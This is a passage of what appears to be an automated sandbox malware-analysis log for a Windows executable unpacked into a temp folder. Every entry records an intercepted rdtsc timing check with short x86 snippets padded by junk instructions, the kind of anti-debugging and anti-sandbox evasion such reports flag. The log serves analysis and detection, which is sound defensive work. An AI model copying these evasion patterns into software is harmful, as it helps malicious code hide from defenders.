                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 723D13 second address: 723D36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FD3A4D6CBB1h 0x0000000c jmp 00007FD3A4D6CBA5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 723D36 second address: 723D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD3A47FEE93h 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 723D50 second address: 723D5F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jc 00007FD3A4D6CB96h 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7241B1 second address: 7241CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FD3A47FEE92h 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7241CA second address: 7241D1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7247BA second address: 7247C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7247C5 second address: 7247C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7247C9 second address: 7247D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7247D1 second address: 7247DB instructions: 0x00000000 rdtsc 0x00000002 js 00007FD3A4D6CBA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 724A66 second address: 724A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD3A47FEE86h 0x0000000a pop edx 0x0000000b pushad 0x0000000c jmp 00007FD3A47FEE98h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 724A8C second address: 724A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD3A4D6CB96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 724A98 second address: 724AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD3A47FEE94h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 724AB7 second address: 724AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD3A4D6CB96h 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 72509A second address: 72509E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 725630 second address: 725669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FD3A4D6CB96h 0x00000009 jmp 00007FD3A4D6CBA2h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD3A4D6CBA5h 0x00000016 jnl 00007FD3A4D6CB96h 0x0000001c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 679633 second address: 679637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 679637 second address: 67964C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push esi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68373F second address: 68375D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FD3A47FEE86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FD3A47FEE8Eh 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 72D9B2 second address: 72D9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 72DF4B second address: 72DF5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FD3A47FEE86h 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 72DF5E second address: 72DF64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 72DF64 second address: 72DF6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FD3A47FEE86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 72DF6F second address: 72DF8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007FD3A4D6CBA0h 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 72DF8A second address: 72DF8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 736953 second address: 736960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FD3A4D6CB96h 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 736ECE second address: 736ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 736ED4 second address: 736EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 736EDF second address: 736EE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 73719D second address: 7371A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7371A3 second address: 7371DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007FD3A47FEE86h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jmp 00007FD3A47FEE93h 0x0000001a jg 00007FD3A47FEE88h 0x00000020 push eax 0x00000021 push edx 0x00000022 jbe 00007FD3A47FEE86h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7371DD second address: 7371E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7380A0 second address: 7380D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Ah 0x00000007 jno 00007FD3A47FEE8Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD3A47FEE94h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7380D1 second address: 7380D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7380D5 second address: 7380F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jp 00007FD3A47FEE86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD3A47FEE8Ch 0x00000011 jnc 00007FD3A47FEE88h 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 735F91 second address: 735F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 735F97 second address: 735FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A47FEE91h 0x00000009 popad 0x0000000a jmp 00007FD3A47FEE92h 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 73E183 second address: 73E189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 73E346 second address: 73E34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 74D0D7 second address: 74D0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD3A4D6CB96h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 75E82B second address: 75E846 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD3A47FEE86h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 ja 00007FD3A47FEE86h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 764516 second address: 76451A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76451A second address: 764520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 764342 second address: 76437E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD3A4D6CB96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD3A4D6CBA5h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 jns 00007FD3A4D6CB96h 0x0000001b pop eax 0x0000001c jmp 00007FD3A4D6CBA0h 0x00000021 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76437E second address: 764383 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76B1C6 second address: 76B1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD3A4D6CBA0h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD3A4D6CB9Ah 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76B5F8 second address: 76B5FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76B5FE second address: 76B604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76B88C second address: 76B8BA instructions: 0x00000000 rdtsc 0x00000002 js 00007FD3A47FEE86h 0x00000008 jmp 00007FD3A47FEE92h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD3A47FEE90h 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76B8BA second address: 76B8C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007FD3A4D6CB96h 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76B8C6 second address: 76B8D8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD3A47FEE86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FD3A47FEE86h 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76B8D8 second address: 76B8DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76BA3E second address: 76BA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76F07A second address: 76F093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A4D6CBA2h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76F1F3 second address: 76F1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 77264B second address: 772661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD3A4D6CB9Dh 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 77CD76 second address: 77CDCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD3A47FEE90h 0x00000008 jne 00007FD3A47FEE86h 0x0000000e jmp 00007FD3A47FEE97h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007FD3A47FEEA0h 0x0000001e jmp 00007FD3A47FEE98h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A72E7 second address: 7A72ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A745B second address: 7A745F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A745F second address: 7A7467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A7467 second address: 7A7472 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007FD3A47FEE86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A7472 second address: 7A7482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FD3A4D6CB96h 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A7482 second address: 7A748C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD3A47FEE86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A7B67 second address: 7A7B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A7B6D second address: 7A7B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A7E46 second address: 7A7E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD3A4D6CB96h 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A7FAA second address: 7A7FAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A813E second address: 7A8144 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A8144 second address: 7A814A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7AC654 second address: 7AC663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD3A4D6CB96h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7AC663 second address: 7AC66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7AC66D second address: 7AC678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7AC678 second address: 7AC67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7ADEFD second address: 7ADF02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7ADF02 second address: 7ADF23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Eh 0x00000007 pushad 0x00000008 jmp 00007FD3A47FEE8Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7ADF23 second address: 7ADF4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A4D6CBA8h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007FD3A4D6CBA6h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D705CA second address: 4D7064F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD3A47FEE99h 0x00000008 sbb ch, FFFFFFC6h 0x0000000b jmp 00007FD3A47FEE91h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov edx, esi 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007FD3A47FEE8Dh 0x0000001c xchg eax, ebp 0x0000001d jmp 00007FD3A47FEE8Eh 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movsx ebx, si 0x0000002a pushfd 0x0000002b jmp 00007FD3A47FEE96h 0x00000030 sub eax, 69007BF8h 0x00000036 jmp 00007FD3A47FEE8Bh 0x0000003b popfd 0x0000003c popad 0x0000003d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D7064F second address: 4D70655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70655 second address: 4D70659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30EE6 second address: 4D30EEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30EEC second address: 4D30F0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30F0B second address: 4D30F28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30F28 second address: 4D30F5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, 6D89h 0x00000011 jmp 00007FD3A47FEE96h 0x00000016 popad 0x00000017 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D80674 second address: 4D80678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D80678 second address: 4D8067E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D8067E second address: 4D80684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
